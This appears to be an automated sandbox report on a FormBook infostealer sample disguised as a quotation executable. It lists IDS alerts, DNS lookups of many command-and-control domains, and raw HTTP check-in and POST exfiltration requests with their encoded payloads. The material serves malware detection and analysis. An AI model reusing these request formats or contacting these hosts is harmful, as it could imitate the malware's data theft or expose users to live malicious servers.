                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49723 -> 172.67.211.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49732 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49711 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49751 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49745 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49733 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49713 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49739 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49743 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49752 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49738 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49741 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49754 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49721 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49746 -> 52.223.13.41:80
                Source: DNS query: www.tgwfj.xyz
                Source: DNS query: www.chatdn.xyz
                Source: DNS query: www.nodefolio.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00C822EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 14 Mar 2025 10:31:20 GMTserver: Apacheset-cookie: __tad=1741948280.7843946; expires=Mon, 12-Mar-2035 10:31:20 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 3b 6f db 30 10 9e ad 5f 71 50 06 c9 48 2d 3a 08 9a 02 b6 a4 0e 05 0a b4 e8 50 24 ed 5c 30 d4 c9 62 2c 91 2a 79 b2 63 04 fe ef 3d ca ca a3 e9 d0 68 b1 48 7e 77 df 43 47 e7 0d 75 6d 19 e5 0d ca 8a 7f 48 53 8b a5 1f 7a 74 8b 4e 7b ca 3c 59 87 b9 38 ed 47 b9 57 4e f7 04 74 e8 b1 88 09 ef 49 dc c9 9d 3c ed c6 e0 9d 2a 62 71 e7 45 ad cd 06 5d ef b4 21 a1 75 8d 59 a7 4d 76 e7 e3 32 17 27 ec ff 5a 95 d1 4e 3a 70 58 69 87 8a 7e b5 da 6c a1 80 a4 21 ea 57 42 ec f7 fb ec b5 46 d1 5e 35 8d f8 98 ac a3 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 51 0d 84 0c 7c 24 02 5d 03 35 08 2f f4 43 ef 2c b3 f0 9e d4 ad 87 da 3a f0 b6 43 2e 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed ad 54 db eb a9 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 2f 67 e7 49 dd 17 8b 0f c9 7c 1d 1d a3 88 dc 21 54 b2 4a 4f e0 2a f7 63 32 51 80 47 9a 16 e9 6b b6 77 c1 20 d7 cf 42 6c 75 ff 7d d2 5c c0 e7 67 27 5f 6f 58 87 ac d2 87 ce 1a cd 91 f1 c9 2a c8 f6 78 0c 95 4f 55 d1 6c 96 71 08 26 ad 7b 28 4a ee 96 6d 90 ed cc 9f f6 f9 65 e6 d0 0f 2d 85 f3 07 08 eb 89 d8 05 9d c1 4e 72 7e 42 64 3b ed 03 d9 97 6a 3d c2 54 8b f2 d1 52 fa ec 6e 7e 3a 7d 5b 5c 81 66 2c 08 ba 8f c0 58 d5 a4 e8 dc 98 f8 bf df 61 4c f5 e5 e0 d1 81 67 19 6e 6d c5 41 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 2b 38 02 a3 47 10 97 4d 17 63 44 df 6e 94 6d ad 2b e2 b3 7a 7c 62 08 73 cb cb e5 f8 f0 d4 e6 95 de c1 58 5b 24 95 f6 ac fe b0 02 63 0d ae 93 32 97 d0 38 ac 8b 37 4c 71 98 87 cb a4 fc d4 6a b5 85 06 1d 8e e3 6a 08 5d 2e 24 5f 22 66 61 2e 63 27 4f 79 87 c4 cd b9 ed 02 7f 0f 7a 57 c4 cc c3 f9 37 31 f0 18 11 17 16 f1 72 0d 3f af bf 15 6f e3 7e 1f 6e ea 53 7b 4e 21 d8 1f d3 08 ff 16 7f 00 60 a3 29 bc 34 04 00 00 Data Ascii: T;o0_qPH-:P$\0b,*yc=hH~wCGumHSztN{<Y8GWNtI<*bqE]!uYMv2'ZN:pXi~l!WBF^5HA;rN+g=*k*dQ|$]5/C,:C."mTU:hJTo/gI|!TJO*c2QGkw Blu}\g'_oX*xOUlq&{(Jme-Nr~Bd;j=TRn~:}[\f,XaLgnmACnL:X^+8GMcDnm+z|bsX[$c287Lqjj].$_"fa.c'OyzW71r?o~nS{N!`)4
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 14 Mar 2025 10:31:23 GMTserver: Apacheset-cookie: __tad=1741948283.7321227; expires=Mon, 12-Mar-2035 10:31:23 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 3b 6f db 30 10 9e ad 5f 71 50 06 c9 48 2d 3a 08 9a 02 b6 a4 0e 05 0a b4 e8 50 24 ed 5c 30 d4 c9 62 2c 91 2a 79 b2 63 04 fe ef 3d ca ca a3 e9 d0 68 b1 48 7e 77 df 43 47 e7 0d 75 6d 19 e5 0d ca 8a 7f 48 53 8b a5 1f 7a 74 8b 4e 7b ca 3c 59 87 b9 38 ed 47 b9 57 4e f7 04 74 e8 b1 88 09 ef 49 dc c9 9d 3c ed c6 e0 9d 2a 62 71 e7 45 ad cd 06 5d ef b4 21 a1 75 8d 59 a7 4d 76 e7 e3 32 17 27 ec ff 5a 95 d1 4e 3a 70 58 69 87 8a 7e b5 da 6c a1 80 a4 21 ea 57 42 ec f7 fb ec b5 46 d1 5e 35 8d f8 98 ac a3 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 51 0d 84 0c 7c 24 02 5d 03 35 08 2f f4 43 ef 2c b3 f0 9e d4 ad 87 da 3a f0 b6 43 2e 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed ad 54 db eb a9 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 2f 67 e7 49 dd 17 8b 0f c9 7c 1d 1d a3 88 dc 21 54 b2 4a 4f e0 2a f7 63 32 51 80 47 9a 16 e9 6b b6 77 c1 20 d7 cf 42 6c 75 ff 7d d2 5c c0 e7 67 27 5f 6f 58 87 ac d2 87 ce 1a cd 91 f1 c9 2a c8 f6 78 0c 95 4f 55 d1 6c 96 71 08 26 ad 7b 28 4a ee 96 6d 90 ed cc 9f f6 f9 65 e6 d0 0f 2d 85 f3 07 08 eb 89 d8 05 9d c1 4e 72 7e 42 64 3b ed 03 d9 97 6a 3d c2 54 8b f2 d1 52 fa ec 6e 7e 3a 7d 5b 5c 81 66 2c 08 ba 8f c0 58 d5 a4 e8 dc 98 f8 bf df 61 4c f5 e5 e0 d1 81 67 19 6e 6d c5 41 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 2b 38 02 a3 47 10 97 4d 17 63 44 df 6e 94 6d ad 2b e2 b3 7a 7c 62 08 73 cb cb e5 f8 f0 d4 e6 95 de c1 58 5b 24 95 f6 ac fe b0 02 63 0d ae 93 32 97 d0 38 ac 8b 37 4c 71 98 87 cb a4 fc d4 6a b5 85 06 1d 8e e3 6a 08 5d 2e 24 5f 22 66 61 2e 63 27 4f 79 87 c4 cd b9 ed 02 7f 0f 7a 57 c4 cc c3 f9 37 31 f0 18 11 17 16 f1 72 0d 3f af bf 15 6f e3 7e 1f 6e ea 53 7b 4e 21 d8 1f d3 08 ff 16 7f 00 60 a3 29 bc 34 04 00 00 Data Ascii: T;o0_qPH-:P$\0b,*yc=hH~wCGumHSztN{<Y8GWNtI<*bqE]!uYMv2'ZN:pXi~l!WBF^5HA;rN+g=*k*dQ|$]5/C,:C."mTU:hJTo/gI|!TJO*c2QGkw Blu}\g'_oX*xOUlq&{(Jme-Nr~Bd;j=TRn~:}[\f,XaLgnmACnL:X^+8GMcDnm+z|bsX[$c287Lqjj].$_"fa.c'OyzW71r?o~nS{N!`)4
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 14 Mar 2025 10:31:25 GMTserver: Apacheset-cookie: __tad=1741948285.7765660; expires=Mon, 12-Mar-2035 10:31:25 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 3b 6f db 30 10 9e ad 5f 71 50 06 c9 48 2d 3a 08 9a 02 b6 a4 0e 05 0a b4 e8 50 24 ed 5c 30 d4 c9 62 2c 91 2a 79 b2 63 04 fe ef 3d ca ca a3 e9 d0 68 b1 48 7e 77 df 43 47 e7 0d 75 6d 19 e5 0d ca 8a 7f 48 53 8b a5 1f 7a 74 8b 4e 7b ca 3c 59 87 b9 38 ed 47 b9 57 4e f7 04 74 e8 b1 88 09 ef 49 dc c9 9d 3c ed c6 e0 9d 2a 62 71 e7 45 ad cd 06 5d ef b4 21 a1 75 8d 59 a7 4d 76 e7 e3 32 17 27 ec ff 5a 95 d1 4e 3a 70 58 69 87 8a 7e b5 da 6c a1 80 a4 21 ea 57 42 ec f7 fb ec b5 46 d1 5e 35 8d f8 98 ac a3 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 51 0d 84 0c 7c 24 02 5d 03 35 08 2f f4 43 ef 2c b3 f0 9e d4 ad 87 da 3a f0 b6 43 2e 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed ad 54 db eb a9 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 2f 67 e7 49 dd 17 8b 0f c9 7c 1d 1d a3 88 dc 21 54 b2 4a 4f e0 2a f7 63 32 51 80 47 9a 16 e9 6b b6 77 c1 20 d7 cf 42 6c 75 ff 7d d2 5c c0 e7 67 27 5f 6f 58 87 ac d2 87 ce 1a cd 91 f1 c9 2a c8 f6 78 0c 95 4f 55 d1 6c 96 71 08 26 ad 7b 28 4a ee 96 6d 90 ed cc 9f f6 f9 65 e6 d0 0f 2d 85 f3 07 08 eb 89 d8 05 9d c1 4e 72 7e 42 64 3b ed 03 d9 97 6a 3d c2 54 8b f2 d1 52 fa ec 6e 7e 3a 7d 5b 5c 81 66 2c 08 ba 8f c0 58 d5 a4 e8 dc 98 f8 bf df 61 4c f5 e5 e0 d1 81 67 19 6e 6d c5 41 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 2b 38 02 a3 47 10 97 4d 17 63 44 df 6e 94 6d ad 2b e2 b3 7a 7c 62 08 73 cb cb e5 f8 f0 d4 e6 95 de c1 58 5b 24 95 f6 ac fe b0 02 63 0d ae 93 32 97 d0 38 ac 8b 37 4c 71 98 87 cb a4 fc d4 6a b5 85 06 1d 8e e3 6a 08 5d 2e 24 5f 22 66 61 2e 63 27 4f 79 87 c4 cd b9 ed 02 7f 0f 7a 57 c4 cc c3 f9 37 31 f0 18 11 17 16 f1 72 0d 3f af bf 15 6f e3 7e 1f 6e ea 53 7b 4e 21 d8 1f d3 08 ff 16 7f 00 60 a3 29 bc 34 04 00 00 Data Ascii: T;o0_qPH-:P$\0b,*yc=hH~wCGumHSztN{<Y8GWNtI<*bqE]!uYMv2'ZN:pXi~l!WBF^5HA;rN+g=*k*dQ|$]5/C,:C."mTU:hJTo/gI|!TJO*c2QGkw Blu}\g'_oX*xOUlq&{(Jme-Nr~Bd;j=TRn~:}[\f,XaLgnmACnL:X^+8GMcDnm+z|bsX[$c287Lqjj].$_"fa.c'OyzW71r?o~nS{N!`)4
                Source: global trafficHTTP traffic detected: GET /7aoy/?wLdh=EfwHw2a0&1XnHA=fp2YbicaeZCvjPlEl0aAeG9DbZJy1pf6RkH12Jc9jsEP3xNt5+yvvuwn7GzaPio27TEiEJpJOLWrHvzanHbqOhWV4kgihPbOC+3XvFKcaqXhBW3X1g== HTTP/1.1Host: www.5s5zz.icuAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dj43/?1XnHA=EkKoskt/waFvdKqmMTR0BsFP9LxzFNjCRcrbFleOd9fMl1ZZ6F30QdqQrdjttZXwjkEVztFs7SmMJNK/tzPQljzAQhaHJZUXpe7tXMTubdPwRzxnOw==&wLdh=EfwHw2a0 HTTP/1.1Host: www.mylivingbio.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b5fo/?1XnHA=/PlOLkIgBbh1jkr9m9QIpVjNVqN/AQG1t1tA2B5ngzg+2ZPn1SOfaIfgu54OO3WPatKJobuG4vpvl8eIAu2jNyr+UOrUVGHFxMUdlmMDVLx6h7FRww==&wLdh=EfwHw2a0 HTTP/1.1Host: www.tgwfj.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /esrt/?1XnHA=Dauko676kCztHQAUUyMqfDrPu2fQElEVTvMTsJhZ5gXLx1NdSwykiYrwT7juNmxOBLlr8LsBbcSb/+BWh1+dEKgLoqbQeSkqVGFp5dHi2mQg5XUXXA==&wLdh=EfwHw2a0 HTTP/1.1Host: www.maxank.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /udq7/?1XnHA=Rfp+Hy7ypq6TblfNmztYCAIAYX0CsX/r1dwSS3/BYvSaAWrqV1h4KNJqwO7WOFQicl/WQZFKFN8T0sKdpeUJssoqR87vo9Y6fzv9BxISuCeH8bW/4w==&wLdh=EfwHw2a0 HTTP/1.1Host: www.shuangunder.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6q0f/?1XnHA=wiwQqHwCkimMGK1NgvTGqgIt6yuFWdpgx/vKhmgmOWN7HwxXpwqIUsOeVf/rnfDynropZ5jJ6rh5lht5oeh52ED7LFLyJYdtCLUyq3hLP97IDCDmfw==&wLdh=EfwHw2a0 HTTP/1.1Host: www.b47uwch1046r.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /eg1u/?wLdh=EfwHw2a0&1XnHA=SD/6wpCnW86cIrWdC51SgvJ3a2i94M6xAqZXzX2LTq+ZxSYJstNKHiEBWhqrQIE7yMyB6clEy8PjJK9sDHiCyb6J4kg3QTLZlCQR8B4F3qLFR0UV7w== HTTP/1.1Host: www.full4movies.christmasAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1lu1/?1XnHA=gnLWuwl3YNLZq+kfxPrzV/SzdlLbLr9wjJY4ZtQulD85or1kaYgFmp8RYbKmTg0As5h6Mjvom9+7CRNf5gL+TS1fMX1rUdAxb+hALxS4PWW8MvwMIw==&wLdh=EfwHw2a0 HTTP/1.1Host: www.boa-first-option.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /80od/?1XnHA=IuBU55xvok3HLpzr12SaTGfRHMw0zfdZqh5Gq7N5X/kkFlbQTPRvjQimlDDv2Xk75v4IRLPjg1IsLOv52448+L33ePNmIrDWVc0I+iOaeG3UnIk7Vw==&wLdh=EfwHw2a0 HTTP/1.1Host: www.12345lopkmj.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d478/?1XnHA=yZiSYoN2a3htTd2ewqQl0+84PN30OlSoYMbqUQeMjg/YAZw5n93PIWGpgWWmb8mQ8VOILxP51EOaJbDvkr6mMF3ddBdCVIRG+Wzx2IYUIngD3m32UA==&wLdh=EfwHw2a0 HTTP/1.1Host: www.utzp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wdfk/?wLdh=EfwHw2a0&1XnHA=dQ/vpVbcLME9vwPjn0SG03f3yT2qEOly+d50wcZtmmpldahEUd9gA/U/hLKsV6Bf0aiX/H+ppQZXy0qtZ/D2funpJSiJU5LZbFVBsOCfizmJVkn3Bg== HTTP/1.1Host: www.keys4health.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7ciy/?1XnHA=zHKEIz0o2n6jgB/iw2njPHtSPGufLrEQVl5Rhq17f2fLN5qLroapQ67U0eY+CFXVn3WbdiYa7ZubGC6ertIlh0EhgF8vX79nY2a8mai5rCoDBh/5xg==&wLdh=EfwHw2a0 HTTP/1.1Host: www.chatdn.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b3dy/?wLdh=EfwHw2a0&1XnHA=h9bs7PJVxZ24zAp/wev+K8YBHIkq/puSw5AYHhggM3Al5Cg+4lnT1wleJpI9wHWBpVcO5JhmorqlsWRv+OmFuLX96uTb1jFeB2z6NOVofMql/eGxWQ== HTTP/1.1Host: www.nodefolio.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vwqy/?1XnHA=v3ZoZSKmjs/ElY9Kz1JRAnSwUAxLKu7hzg3dHORkdyRJknvTPlvLy9hszWAf9XBOUxgBVtKXDaR+AVr7OKAzTbLOeVwkmWo6x8JoYjDvYjFfSc8cfg==&wLdh=EfwHw2a0 HTTP/1.1Host: www.lindaashley.weddingAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qm65/?wLdh=EfwHw2a0&1XnHA=WKDdNWC7INV6sdOGlRhYeERsi/jVAkm/zrWG+knbwk3UKiu1mAWcQNEx7C72Rm2XZizvCRn0VF5y6M8t/wPObL4W5JSsJ+LGUm9y0DO2W0n5EO60ag== HTTP/1.1Host: www.myhandyplanner.coursesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /l6hh/?1XnHA=lTdr3okON/nO134jHjo5j9MCA0yiAAI+q/U28XI3SSxt7kassWMM3ug03Yp9pDf1Jp8lbGPsJ2MbcZ+NXrt4dl/dIy7G2i+6qqhdsAuOw5c5jIVmFg==&wLdh=EfwHw2a0 HTTP/1.1Host: www.super-mist.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.5s5zz.icu
                Source: global trafficDNS traffic detected: DNS query: www.mylivingbio.online
                Source: global trafficDNS traffic detected: DNS query: www.tgwfj.xyz
                Source: global trafficDNS traffic detected: DNS query: www.maxank.top
                Source: global trafficDNS traffic detected: DNS query: www.shuangunder.shop
                Source: global trafficDNS traffic detected: DNS query: www.b47uwch1046r.shop
                Source: global trafficDNS traffic detected: DNS query: www.full4movies.christmas
                Source: global trafficDNS traffic detected: DNS query: www.boa-first-option.click
                Source: global trafficDNS traffic detected: DNS query: www.12345lopkmj.lol
                Source: global trafficDNS traffic detected: DNS query: www.utzp.top
                Source: global trafficDNS traffic detected: DNS query: www.keys4health.net
                Source: global trafficDNS traffic detected: DNS query: www.chatdn.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nodefolio.xyz
                Source: global trafficDNS traffic detected: DNS query: www.lindaashley.wedding
                Source: global trafficDNS traffic detected: DNS query: www.myhandyplanner.courses
                Source: global trafficDNS traffic detected: DNS query: www.super-mist.store
                Source: unknownHTTP traffic detected: POST /dj43/ HTTP/1.1Host: www.mylivingbio.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.mylivingbio.onlineCache-Control: no-cacheContent-Length: 194Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.mylivingbio.online/dj43/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36Data Raw: 31 58 6e 48 41 3d 4a 6d 69 49 76 53 56 6c 32 66 56 48 58 36 57 41 53 33 35 39 4a 2f 55 4a 39 72 35 77 4d 50 4b 42 45 66 65 4a 52 57 50 41 65 74 50 58 76 58 51 52 33 47 47 7a 51 59 2f 33 76 38 2f 46 31 35 76 30 69 30 4d 30 34 4c 4d 58 72 67 33 32 59 66 65 6c 30 52 62 68 72 47 6d 65 58 51 62 30 43 75 59 48 6d 63 6a 76 59 71 75 52 4c 65 44 31 57 7a 73 32 62 79 61 42 78 56 31 58 46 41 49 2f 39 39 33 68 67 4a 6a 4b 74 64 35 61 68 74 69 35 6c 6f 35 4f 7a 4c 45 46 42 4d 59 38 50 51 6b 62 61 7a 41 4b 6e 61 4e 35 65 34 72 69 4a 32 77 71 35 34 66 56 50 44 58 6b 62 69 58 65 4d 5a 75 52 Data Ascii: 